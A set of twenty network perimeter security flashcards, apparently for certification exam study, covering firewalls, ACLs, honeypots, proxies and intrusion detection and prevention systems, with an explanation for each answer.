Chapter 6 - Network Perimeter Security Flashcards

1
Q
Which tool would you use if you want to view the contents of a packet?
A. TDR
B. Port scanner
C. Protocol analyzer
D. Loopback adapter
A

C. A protocol analyzer has the capability to “drill” down through a packet and show the contents of that packet as they correspond to the OSI model.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
2
Q

The honeypot concept is enticing to administrators because
A. It enables them to observe attacks.
B. It traps an attacker in a network.
C. It bounces attacks back at the attacker.
D. It traps a person physically between two locked doors.

A

A. By creating a honeypot, the administrator can monitor attacks without sustaining damage to a server or other computer. Don’t confuse this with a honeynet (answer B), which is meant to attract and trap malicious attackers in an entire false network. Answer C is not something that an administrator would normally do, and answer D is defining a man trap.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
3
Q
James has detected an intrusion in his company.  What should he check first?
A. DNS Logs
B. Firewall logs
C. The Event Viewer
D. Performance logs
A

B. If there were an intrusion, the first thing you should check are the firewall logs. DNS logs in the event viewer and the performance logs will most likely not show intrusions to the company. The best place to look first is the firewall logs.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
4
Q
Which of the following devices should you employ to protect your network?   (Select the best answer.)
A. Protocol analyzer
B. Firewall
C. DMZ
D. Proxy server
A

B. Install a firewall to protect the network. Protocol analyzers do not help to protect a network but are valuable as vulnerability assessment and monitoring tools. Although a DMZ and a proxy server could possibly help to protect a portion of the network to a certain extent, the best answer is firewall.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
5
Q
Which device’s log file will show access control lists and who was allowed access
and who wasn’t?
A. Firewall
B. PDA
C. Performance monitor
D. IP proxy
A

A. A firewall contains one or more access control lists (ACLs) defining who is enabled to access to the network. The firewall can also show attempts at access and whether they succeeded or failed. A personal digital assistant (PDA) might list who called or e-mailed, but as of the writing of this book does not use ACLs. Performance Monitor analyzes the performance of a computer, and an IP proxy deals with network address translation, hiding many private IP addresses behind one public address. Although the function of an IP proxy is often built into a firewall, the best answer would be firewall.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
6
Q
Where are software firewalls usually located?
A. On routers
B. On servers
C. On clients
D. On every computer
A

C. Software-based firewalls, such as the Windows Firewall, are normally running on the client computers. Although a software-based firewall could also be run on a server, it is not as common. Also, a SOHO router might have a built-in firewall, but not all routers have firewalls.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
7
Q

Where is the optimal place to have a proxy server?
A. In between two private networks
B. In between a private and a public network
C. In between two public networks
D. On all of the servers

A

B. Proxy servers should normally be between the private and the public network. This way they can act as a go-between for all the computers located on the private network. This applies especially to IP proxy servers but might also include HTTP proxy servers.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
8
Q
A coworker has installed an SMTP server on the company firewall.  What security principle does this violate?
A. Chain of custody
B. Use of a device as it was intended
C. Man trap
D. Use of multifunction network devices
A

B. SMTP servers should not be installed on a company firewall. This is not the intention of a firewall device. The SMTP server should most likely be installed
within a DMZ.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
9
Q
You are working on a server and are busy implementing a network intrusion detection system on the network.  You need to monitor the network traffic from the server.  What mode should you configure the network adapter to work in?
A. Half-duplex mode
B. Full-duplex mode
C. Auto configuration mode
D. Promiscuous mode
A

D. To monitor the implementation of NIDS on the network, you should configure the network adapter to work in promiscuous mode; this forces the network adapter to pass all the traffic it receives to the processor, not just the frames that were addressed to that particular network adapter. The other three answers have to do with duplexing—whether the network adapter can send and receive simultaneously.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
10
Q
Which of the following displays a single public IP address to the Internet while hiding a group of internal private IP addresses?
A. HTTP proxy
B. Protocol analyzer
C. IP proxy
D. SMTP proxy
A

C. An IP proxy displays a single public IP address to the Internet while hiding a group of internal private IP addresses. It sends data back and forth between the IP addresses by using Network Address Translation (NAT). This functionality is usually built into SOHO routers and is one of the main functions of those routers. HTTP proxies store commonly accessed Internet information. Protocol analyzers enable the capture and viewing of network data. SMTP proxies act as a go-between for e-mail.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
11
Q
If your ISP blocks objectionable material, what device would you guess has been implemented?
A. Proxy server
B. Firewall
C. Internet content filter
D. NIDS
A

C. An Internet content filter, usually implemented as content-control software can block objectionable material before it ever gets to the user. This is common in schools, government, and many companies.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
12
Q
Of the following, which is a collection of servers that was set up to attract hackers?
A. DMZ
B. Honeypot
C. Honeynet
D. VLAN
A

C. A honeynet is a collection of servers set up to attract hackers. A honeypot is usually one computer or one server that has the same purpose. A DMZ is the demilitarized zone that is in between the LAN and the Internet. A VLAN is a virtual LAN.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
13
Q
Which of the following will detect malicious packets and discard them?
A. Proxy server
B. NIDS
C. NIPS
D. PAT
A

C. NIPS, or a network intrusion prevention system, detects and discards malicious packets. A NIDS only detects them and alerts the administrator. A proxy server acts as a go-between for clients sending data to systems on the Internet. PAT is port-based address translation.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
14
Q
Which of the following will an Internet filtering appliance analyze? (Select the three best answers.)
A. Content
B. Certificates
C. Certificate revocation lists
D. URLs
A

A, B, and D. However, certificate revocation lists will most likely not be analyzed. Remember that CRLs are published only periodically.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
15
Q
Which of the following devices would detect but not react to suspicious behavior on the network?
A. NIPS
B. Firewall
C. NIDS
D. HIDS
A

C. A NIDS will detect suspicious behavior but most likely not react to it. To prevent it and react to it you would want a NIPS. Firewalls block certain types of traffic but by default do not check for suspicious behavior. HIDS is the host-based version of an IDS; it checks only the local computer, not the network.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
16
Q
One of the programmers in your organization complains that he can no longer transfer files to the FTP server. You check the network firewall and see that the proper FTP ports are open.  What should you check next?
A. ACLs
B. NIDS
C. AV definitions
D. FTP permissions
A

A. Access control lists can stop particular network traffic (such as FTP transfers) even if the appropriate ports are open. A NIDS will detect traffic and report on it but not prevent it. Antivirus definitions have no bearing on this scenario. If the programmer was able to connect to the FTP server, the password should not be an issue. FTP permissions might be an issue, but since you are working in the firewall, you should check the ACL first; then later you can check on the FTP permissions, passwords, and so on.

17
Q
Which of the following is likely to be the last rule contained within the ACLs of a firewall?
A. Time of day restrictions
B. Explicit allow
C. IP allow any
D. Implicit deny
A

D. Implicit deny (block all) is often the last rule in a firewall; it is added automatically by the firewall, not by the user. Any rules that allow traffic will be before the implicit deny/block all on the list. Time of day restrictions will probably be stored elsewhere but otherwise would be before the implicit deny as well.

18
Q

Which of the following best describes an IPS?
A. A system that identifies attacks
B. A system that stops attacks in progress
C. A system that is designed to attract and trap attackers
D. A system that logs attacks for later analysis

A

B. An IPS (intrusion prevention system) is a system that prevents or stops attacks in progress. A system that only identifies attacks would be an IDS. A system designed to attract and trap attackers would be a honeypot. A system that logs attacks would also be an IDS or several other devices or servers.

19
Q
What is a device doing when it actively monitors data streams for malicious code?
A. Content inspection
B. URL filtering
C. Load balancing
D. NAT
A

A. A device that is actively monitoring data streams for malicious code is inspecting the content. URL filtering is the inspection of the URL only (for example, www.comptia.org). Load balancing is the act of dividing up workload between multiple computers. NAT is network address translation, which is often accomplished by a firewall or IP proxy.

20
Q
Allowing or denying traffic based on ports, protocols, addresses, or direction of data is an example of what?
A. Port security
B. Content inspection
C. Firewall rules
D. Honeynet
A

C. Firewall rules (ACLs) are generated to allow or deny traffic. They can be based on ports, protocols, IP addresses, or which way the data is headed. Port security deals more with switches and the restriction of MAC addresses that are allowed to access particular physical ports. Content inspection is the filtering of web content, checking for inappropriate or malicious material. A honeynet is a group of computers or other systems designed to attract and trap an attacker.